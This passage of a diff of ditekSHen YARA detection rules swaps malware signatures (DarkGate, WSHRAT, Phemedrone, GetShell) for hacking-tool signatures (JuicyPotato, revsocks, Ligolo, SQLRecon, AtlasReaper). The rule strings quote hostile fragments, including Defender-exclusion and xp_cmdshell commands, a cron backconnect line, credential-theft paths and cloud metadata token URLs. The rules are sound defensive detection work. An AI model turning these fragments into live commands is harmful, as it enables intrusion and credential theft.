-		$s5 = "DOMAINS DETECTED" wide
-		$s6 = "snder" ascii
+		$s1 = "splwow64.exe" fullword ascii
+		$s2 = "notepad.exe" fullword ascii
+		$s3 = "%s\\System32\\cmd.exe" fullword wide
+		$s4 = "[SystemFolder]msiexec.exe" fullword wide
+		$s5 = "microsoft plz" ascii
+		$s6 = "%TEMP%\\" fullword wide
+		$x1 = "\\InstallerFileTakeOver.pdb" ascii
+		$o1 = { 48 b8 fe ff ff ff ff ff ff 7f 48 8b f5 48 83 ce }
+		$o2 = { 4c 8d 62 10 48 c7 c7 ff ff ff ff 48 8b c7 66 0f }
+		$o3 = { ff 15 9a 59 00 00 48 8b d8 e8 ba ff ff ff 45 33 }
+		$o4 = { 49 c7 43 a8 fe ff ff ff 49 89 5b 10 48 8b 05 5a }
+		$o5 = { 66 89 7c 24 50 48 c7 c2 ff ff ff ff 48 ff c2 66 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $o* ) ) ) or 4 of ( $s* ) or ( all of ( $o* ) and 2 of them ) )
 }
-rule DITEKSHEN_MALWARE_Win_Abubasbanditbot : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PRI_Juicypotato : FILE
 {
 	meta:
-		description = "Detects Abubasbandit Bot. Observed to drop cryptocurrency miner detected by MALWARE_Win_CoinMiner02"
+		description = "Detect JuicyPotato"
 		author = "ditekSHen"
-		id = "8bedd1f7-bd77-5f26-8665-1d23fe56100f"
+		id = "2fb52598-9771-507b-a06d-7b9bc693ffee"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10524-L10541"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1255-L1270"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aae40178dadff720b42d211a025fd696eabdcc91761c6a91809f5f088c588c31"
+		logic_hash = "43a7ac16b9633fd2e6c43ca142cd0d0e2166287bb51e1b6344119959fe054c19"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "magickeycmd" ascii
-		$x2 = "chat_id" ascii
-		$x3 = "GetTempPathW" ascii
-		$x4 = "Add-MpPreference" ascii
-		$x5 = "-Command" ascii
-		$s1 = "application/x-www-form-urlencoded" ascii
-		$s2 = "gzip, deflate/index.html" ascii
-		$s3 = "powershellAdd-MpPreference -ExclusionPath" ascii
-		$s4 = "tar-xf-C" ascii
-		$s5 = "temp_file.bin" ascii
+		$x1 = "\\JuicyPotato.pdb" ascii
+		$x2 = "JuicyPotato v%s" fullword ascii
+		$s1 = "hello.stg" fullword wide
+		$s2 = "ppVirtualProcessorRoots" fullword ascii
+		$s3 = "Lock already taken" fullword ascii
+		$s4 = "[+] authresult %d" fullword ascii
+		$s5 = "RPC -> send failed with error: %d" fullword ascii
+		$s6 = "Priv Adjust FALSE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 4 of ( $x* ) and 2 of ( $s* ) ) or ( ( all of ( $s* ) and 3 of ( $x* ) ) ) or ( 8 of them ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 5 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Oracrat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ENUM_Sharpshares : FILE
 {
 	meta:
-		description = "Detects OracRAT / Comfoo / Babar"
+		description = "Detects SharpShares multithreaded C# .NET Assembly to enumerate accessible network shares in a domain"
 		author = "ditekSHen"
-		id = "53f3778e-56d5-5390-8ce7-82d4ede46be4"
+		id = "1da53e34-21a3-5b3c-885e-dcc8814ac3c8"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10543-L10557"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1290-L1305"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "078a5df9f3d0bb8213ea2fe28eefdb453ef186e6c1f62d3ba10cb04fca047700"
+		logic_hash = "8b35d6a692814e1b27ffc1db4ab124bf621c156aaf57f24796c422ec95a85715"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\\\.\\DevCtrlKrnl" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\IE4\\Setup" fullword ascii
-		$s3 = "\\PLUGINS" fullword ascii
-		$s4 = "\\config\\sam" fullword ascii
-		$s5 = "\\iexplore.exe\" about:blank" fullword ascii
-		$s6 = "usbak.sys" fullword ascii
-		$s7 = "userctfm" fullword ascii
+		$s1 = "SharpShares." ascii wide
+		$s2 = "GetComputerShares" fullword ascii
+		$s3 = "userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2" wide
+		$s4 = "GetAllShares" fullword ascii
+		$s5 = "stealth:" wide
+		$s6 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*))" fullword wide
+		$s7 = /\/targets|ldap|threads/ wide
+		$s8 = "entriesread" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Phemedronestealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PROX_Revsocks : FILE
 {
 	meta:
-		description = "Detects Phemedrone Stealer infostealer"
+		description = "Detects revsocks Reverse socks5 tunneler with SSL/TLS and proxy support"
 		author = "ditekSHen"
-		id = "297aab1f-351c-5955-8a19-9aa2b7c94748"
+		id = "f85bc557-40ab-5533-8a89-a2de9bbc9ad9"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10559-L10580"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1307-L1321"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "74e150cc971f5648f9e3f6146afba162b1a29cf2744c862b2320db52c2efa930"
+		logic_hash = "4a8e68f25b7ba10b0eb9772ed4ba2b9c6566768f2b5a2859df8bac644d196bf3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$p1 = /\{ file = \{(0|file)\}, data = \{(1|data)\} \}/ ascii wide
-		$p2 = "{ <>h__TransparentIdentifier0 = {0}, match = {1} }" wide
-		$p3 = "{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }" wide
-		$p4 = "{<>h__TransparentIdentifier0}, match = {match} }" ascii
-		$p5 = "{<>h__TransparentIdentifier1}, encrypted = {encrypted} }" ascii
-		$s1 = "<KillDebuggers>b__" ascii
-		$s2 = "<ParseExtensions>b__" ascii
-		$s3 = "<ParseDiscordTokens>b__" ascii
-		$s4 = "<IsVM>b__" ascii
-		$s5 = "<Key3Database>b__" ascii
-		$s6 = "masterPass" ascii
-		$s7 = "rootLocation" ascii
-		$s8 = "rgsServiceNames" ascii
-		$s9 = "rgsFilenames" ascii
+		$s1 = "main.agentpassword" fullword ascii
+		$s2 = "main.connectForSocks" fullword ascii
+		$s3 = "main.connectviaproxy" fullword ascii
+		$s4 = "main.DnsConnectSocks" fullword ascii
+		$s5 = "main.listenForAgents" fullword ascii
+		$s6 = "main.listenForClients" fullword ascii
+		$s7 = "main.getPEMs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $p* ) and 3 of ( $s* ) ) or ( 3 of ( $p* ) and 4 of ( $s* ) ) or ( 7 of ( $s* ) ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_WSHRAT : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Azbelt : FILE
 {
 	meta:
-		description = "Detects WASHRAT"
+		description = "Detects azbelt for enumerating Azure related credentials primarily on AAD joined machines"
 		author = "ditekSHen"
-		id = "e7940b7f-51dd-5a32-899b-64310f27bf3e"
+		id = "cf9268d2-1928-51e8-9643-ee0a5bada9fa"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10582-L10600"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1323-L1338"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "297bfe65815637a464e2a8fc23570c6e79694ffe0467d5898b7c845f1450de95"
+		logic_hash = "71cc2b3418ea5e285adafe03fa80bade67dc3e4073fe58d42bc6190860b48b43"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "WSH Rat v" wide
-		$x2 = "SOFTWARE\\WSHRat" wide
-		$x3 = "WSH Remote" wide nocase
-		$x4 = "WSHRAT" wide nocase
-		$s1 = "shellobj.regwrite \"HKEY_" ascii nocase
-		$s2 = "shellobj.run(\"%comspec% /c" ascii nocase
-		$s3 = "objhttpdownload.setrequestheader \"user-agent:\"," ascii nocase
-		$s4 = "WScript.CreateObject(\"Shell.Application\").ShellExecute" ascii nocase
-		$s5 = "objwmiservice.ExecQuery(\"select" ascii nocase
-		$s6 = "httpobj.open(\"post\",\"http" ascii nocase
-		$s7 = /(rdp|keylogger|get-pass|uvnc)\|http/ wide
+		$s1 = "@http://169.254.169.254/metadata/identity/oauth2/token?api-version=" ascii
+		$s2 = "@Partner Customer Delegated Admin Offline Processor" fullword ascii
+		$s3 = "@TargetName: " fullword ascii
+		$s4 = "httpclient.nim" fullword ascii
+		$s5 = "@DSREG_DEVICE_JOIN" fullword ascii
+		$s6 = "@.azure/msal_token_cache.bin" fullword ascii
+		$s7 = "CredEnumerateW" fullword ascii
+		$s8 = "@http://169.254.169.254/metadata/instance?api-version=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Rustystealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Dontsleep : FILE
 {
 	meta:
-		description = "Detect Rusty / Luca stealer"
-		author = "ditekSHen"
-		id = "af39f88c-e0df-51f6-bb11-f3a7231180d0"
+		description = "Detects Keep Host Unlocked (Don't Sleep)"
+		author = "ditekShen"
+		id = "f71bd0d5-a526-5f1e-8bd3-9e653db610a7"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10602-L10625"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1340-L1354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e60e66360c8f97a31e75cd90a12519f75f3a672874fc985a8da1d4d02e185b4d"
+		logic_hash = "b8e2132d3b36c3e2d2662a586916c7e4fc029f81af08b5c18006833c4e6f772f"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "EdgeMicrosoftedgechromiumChromium7star7StaramigoAmigobraveBrave" ascii
-		$s2 = "BrowserchromeChromekometaKometaorbitumOrbitumsputnikSputniktorchTorchucozmediaUranuCozMediavivaldiVivaldiatom" ascii
-		$s3 = ".kdbx.pdf.doc.docx.xls.xlsx.ppt.pptx.odt.odp\\logscx\\sensfiles.zip" ascii
-		$s4 = "dumper.rs" ascii
-		$s5 = "decryption_core.rs" ascii
-		$s6 = "anti_emulation.rs" ascii
-		$s7 = "discord.rs" ascii
-		$s8 = /\\logscx\\(passwords_|cookies_|creditcards_)/ ascii
-		$s9 = "VirtualBoxVBoxVMWareVMCountry" ascii
-		$s10 = "New Log From ( /  )" ascii
-		$s11 = "BrowserChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldiAtomMail" ascii
-		$s12 = "BrowserBraveSoftwareCentBrowserChedotChrome" ascii
-		$s13 = "ChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldi" ascii
-		$s14 = "hostnameencryptedUsernameencryptedPasswordstruct" ascii
-		$s15 = "encryptedPassword" fullword ascii
-		$s16 = "AutoFill@~" fullword ascii
+		$s1 = ":Repeat###DEL \"%s\"###if exist \"%s\" goto Repeat###DEL \"%s\"###" wide
+		$s2 = "powrprof.dll,SetSuspendState" wide
+		$s3 = "_selfdestruct.bat" wide
+		$s4 = "please_sleep_block_" ascii
+		$s5 = "Browser-Type: MiniBowserOK" wide
+		$s6 = "m_use_all_rule_no_sleep" ascii
+		$s7 = "BlockbyExecutionState: %d on:%d by_enable:%d" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Simplepacker : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Nsudo : FILE
 {
 	meta:
-		description = "Detects Hydrochasma packer / dropper"
-		author = "ditekSHen"
-		id = "449f7531-408f-5bda-aa64-d148c363c3e5"
+		description = "Detects NSudo allowing to run processes as TrustedInstaller or System"
+		author = "ditekShen"
+		id = "9a21b923-b02e-553b-8f53-026d7034c319"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10627-L10638"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1356-L1369"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2c07947fdf53814669250052f6cceb7412aa302422f3a0b430879da638c7e6a"
+		logic_hash = "6bcffa79ca06b0b4178d6ea256f98d917c2b19cec0b059889b8d015d226a53f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$p1 = "\\cloud-compiler-" ascii
-		$p2 = "\\deps\\simplepacker.pdb" ascii
-		$s1 = "uespemosarenegylmodnarodsetybdetqueue" ascii
-		$s2 = "None{\"" ascii
+		$x1 = "cmd /c start \"NSudo." wide
+		$x2 = "*\\shell\\NSudo" fullword wide
+		$x3 = "Projects\\NSudo\\Output\\Release\\x64\\NSudo.pdb" ascii
+		$s1 = "-ShowWindowMode=Hide" wide
+		$s2 = "?what@exception@@UEBAPEBDXZ" fullword ascii
+		$s3 = "NSudo.RunAs." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $p* ) or ( 1 of ( $p* ) and all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or all of ( $s* ) or 4 of them )
 }
-rule DITEKSHEN_MALWARE_Multi_Golangbypassav : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ligolo : FILE
 {
 	meta:
-		description = "Detect Go executables using GolangBypassAV"
+		description = "Detects Ligolo tool for establishing SOCKS5 or TCP tunnels from a reverse connection"
 		author = "ditekSHen"
-		id = "bd41ff7e-ce57-5bee-b6ca-9341b4c1c1fa"
+		id = "cc461fd1-9a2f-59ce-af74-a0f55b8850b1"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10679-L10689"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1371-L1385"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "842dfc7c04cbd19bbbc8b6fbf9d9925f81a21dfb713af4542ca4157d64fa5b51"
+		logic_hash = "b515dc184013c2f67d37e42d7172e2471b3a93c94024be12c7f587296287282d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.GolangBypassAV"
-		clamav2 = "MALWARE.Linux.Trojan.GolangBypassAV"
 
 	strings:
-		$s1 = "/GolangBypassAV/gen/" ascii
+		$p1 = "/ligolo/main.go" ascii
+		$p2 = "/armon/go-socks5" ascii
+		$s1 = "main.StartLigolo" fullword ascii
+		$s2 = "main.handleRelay" fullword ascii
+		$s3 = "main.startSocksProxy" fullword ascii
+		$s4 = "_main.tlsFingerprint" fullword ascii
+		$s5 = "main.verifyTlsCertificate" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 1 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( all of ( $p* ) and 1 of ( $s* ) ) or all of ( $s* ) or ( 1 of ( $p* ) and 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Blankstealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Extpassword : FILE
 {
 	meta:
-		description = "Detects BlankStealer / BlankGrabber / Blank-c Stealer"
+		description = "Detects ExtPassword External Drive Password Recovery"
 		author = "ditekSHen"
-		id = "19686781-4be8-56c1-b606-d8fe14dbdc48"
+		id = "bb06d2c1-964d-5a3d-a741-09b8ef5ac7fa"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10691-L10703"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1387-L1403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc0c8d3e0061d192e445ef661387360644ab428a9e9fc2480e966db96bc8264c"
+		logic_hash = "525530cb7e9f44be0408fd710306f90056b1b6b9a9e4779d8c1eb1ddef443fb0"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		snort = "923829001"
 
 	strings:
-		$s1 = "Blank-c" ascii
-		$s2 = "Stealer License" ascii
-		$s3 = "UID=" ascii
-		$h1 = { 42 6c 61 6e 6b 2d 63 0a 53 74 65 61 6c 65 72 20 4c 69 63 65 6e 73 65 0a 55 49 44 3d }
+		$x1 = "ExtPassword!" fullword wide
+		$s2 = "GReading Chrome password file: %s" fullword wide
+		$s3 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy%d" fullword wide
+		$s4 = "2015-07-27 13:49:41 b8e92227a469de677a66da62e4361f099c0b79d0" ascii
+		$s5 = "metadata WHERE id = 'password'" ascii
+		$s6 = /Scanning\s(Credentials\sfolder|Credentials\sfolder|Firefox\sand\sother\sMozilla\sWeb\sbrowsers|Chromium-based\Web\browsers|Outlook\saccounts|Windows\sVault|dialup\/VPN\sitems|wireless\skeys|Windows\ssecurity\squestions|vault\spasswords)/ wide
+		$s7 = "lhelp32Snapsho" fullword ascii
+		$s8 = "SELECT origin_" fullword ascii
+		$s9 = "password#Ck" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x4152 and 2 of them ) or ( all of ( $s* ) or 1 of ( $h* ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* )
 }
-rule DITEKSHEN_MALWARE_Linux_Getshell : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ngrok : FILE
 {
 	meta:
-		description = "Detect GetShell Linux backdoor"
+		description = "Detects Ngrok"
 		author = "ditekSHen"
-		id = "cccad93d-cd49-5237-96ac-66c9ac6ef532"
+		id = "fc0a0de8-b68b-5b6b-a222-bbc031ebabd3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10705-L10725"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1405-L1418"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9d44ad2a3c270eed0e905402e8c32dcca54da90f4229d9d59874ee09b3b47277"
+		logic_hash = "f4bba142652aaf77e5b7c123b743cf165ae17210c39cf65b7311f7e7bd91f7e1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Linux.Trojan.GetShell"
 
 	strings:
-		$x1 = "cat <(echo '@reboot echo socks5_backconnect" ascii
-		$x2 = "(cd  && )') <(sed '/socks5_backconnect" ascii
-		$s1 = "cat <(echo '@" ascii
-		$s2 = "(cd  && )') <(sed '" ascii
-		$s3 = "PORT1:" ascii
-		$s4 = "HOST1:" ascii
-		$s5 = "queryheader" ascii
-		$s6 = "qsectionpost" ascii
-		$s7 = "packedip" ascii
-		$s8 = "copydata" ascii
-		$s9 = "synsend" ascii
-		$s10 = "bc_connect" ascii
+		$s1 = "dashboard.ngrok.com" ascii
+		$s2 = "go.ngrok.com/cmd/ngrok/main.go" ascii
+		$s3 = "ngrok agent" ascii
+		$s4 = "*ngrok.clientInfo" ascii
+		$s5 = "'%s'  socket: '%s'  port: %d/edges/https/{{ .EdgeID }}/routes/{{ .ID }}/webhook_" ascii
+		$s6 = "/{{ .ID }}/tunnel_sessions/{{ .ID }}/restart" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and ( ( all of ( $x* ) and 1 of ( $s* ) ) or 5 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 3 of them )
 }
-rule DITEKSHEN_MALWARE_Win_Solarmarker : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sqlrecon : FILE
 {
 	meta:
-		description = "Detects SolarMarker"
+		description = "Detects SQLRecon C# MS-SQL toolkit designed for offensive reconnaissance and post-exploitation"
 		author = "ditekSHen"
-		id = "78c2f739-76b2-5a80-8b9a-6c677d578eaa"
+		id = "ec91285b-690d-5fd3-b0fc-f8d72cbb7e15"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10727-L10745"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1420-L1436"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84182c8948c2f40439cd932885ae8b88bb677ecc9fba366f22d30e13dc4ffb68"
+		logic_hash = "784dbc518cf9492557c9b3536256c4a9b03e4536cf7cee7e764b8009dd4686bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "token_type" fullword ascii
-		$x2 = "request_data" fullword ascii
-		$x3 = "request_timeout" fullword ascii
-		$x4 = { 74 6f 6b 65 6e 73 00 66 72 6f 6d 00 74 6f 00 73 5f (66|72) }
-		$s1 = "set_UseShellExecute" fullword ascii
-		$s2 = "<Select>b__0" fullword ascii
-		$s3 = "<get>b__e" fullword ascii
-		$s4 = "<get>b__10" fullword ascii
-		$s5 = "<get>b__f" fullword ascii
-		$s6 = "<set>b__0" fullword ascii
-		$s7 = "<set>b__1" fullword ascii
+		$s1 = "ConvertDLLToSQLBytes" ascii
+		$s2 = "\\SQLRecon.pdb" ascii
+		$s3 = "GetAllSQLServerInfo" ascii
+		$s4 = "<GetMSSQLSPNs>b__" ascii
+		$s5 = "select 1; exec master..xp_cmdshell" wide
+		$s6 = "-> Command Execution" wide
+		$s7 = ";EXEC dbo.sp_add_jobstep @job_name =" wide
+		$s8 = "EXEC sp_drop_trusted_assembly 0x" wide
+		$s9 = "(&(sAMAccountType=805306368)(servicePrincipalName=MSSQL*))" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWRE_Win_Darkgate : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Atlasreaper : FILE
 {
 	meta:
-		description = "Detects DarkGate infostealer and coinminer"
+		description = "Detects AtlasReaper command-line tool for Confluence and Jira reconnaissance, credential farming and social engineering"
 		author = "ditekSHen"
-		id = "4488e1e6-daac-5832-8326-3151c834daf1"
+		id = "a0b4e134-bb05-5cc3-af71-516a0407aa1b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10747-L10771"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1438-L1453"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "805a04bbb3915d539e76927393384a2786c25490e8b9fc151d5b12415247578b"
+		logic_hash = "4a0436d5c3f1609d23b2b919bebdc56a7fd63e81b99e72dcda1022487cb88240"
 		score = 75
 		quality = 50
 		tags = "FILE"
 
 	strings:
-		$x1 = "SYSTEM Elevation: Completed, new DarkGate connection with SYSTEM privileges" ascii
-		$x2 = "-u 0xDark" ascii
-		$x3 = "DarkGate" ascii
-		$x4 = "/c cmdkey /generic:\"127.0.0.2\" /user:\"SafeMode\" /pass:\"darkgatepassword0\"" ascii
-		$s1 = "c:\\temp\\crash.txt" ascii
-		$s2 = "/cookiesfile \"" ascii
-		$s3 = "/c rmdir /s /q \"" ascii
-		$s4 = "/c xcopy /E /I /Y \"%s\" \"%s\" && exit" ascii
-		$s5 = "U_MemScan" ascii
-		$s6 = "U_Google_AD" ascii
-		$s7 = "untBotUtils" ascii
-		$s8 = "____padoru____" ascii
-		$s9 = "u_SysHook" ascii
-		$s10 = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=" ascii
-		$s11 = "C:\\Windows\\System32\\ntdll.dll" fullword ascii
-		$s12 = /(SYSTEM )?Elevation: (Cannot|I already|AT RAW|FAILURE)/ ascii
-		$s13 = /Stub: (WARNING:|Configuration updated:|Global Ping Invoked)/ ascii
+		$s1 = "/((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})/" fullword wide
+		$s2 = "/rest/api/3/search?jql=" fullword wide
+		$s3 = "attachments+IS+NOT+EMPTY&fields=attachment,summary,status" fullword wide
+		$s4 = "<ParseJira>b__" ascii
+		$s5 = "<Atlas_Doc_Format>k__" ascii
+		$s6 = "<ParseConfluence>b__" ascii
+		$s7 = "AtlasReaper_ProcessedByFody" fullword ascii
+		$s8 = /AtlasReaper\.(Jira|Confluence)/ fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) ) ) or ( 10 of them )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Rookie_Downloader : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ngroksharp : FILE
 {
 	meta:
-		description = "Detect malware downlaoder, variant of ZombieBoy downloader"
+		description = "Detects NgrokSharp .NET library for Ngrok"
 		author = "ditekSHen"
-		id = "a991eecb-5275-5e33-bea4-e709590474a8"
+		id = "7c335021-4afd-5878-83c3-9bb2c81f3586"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
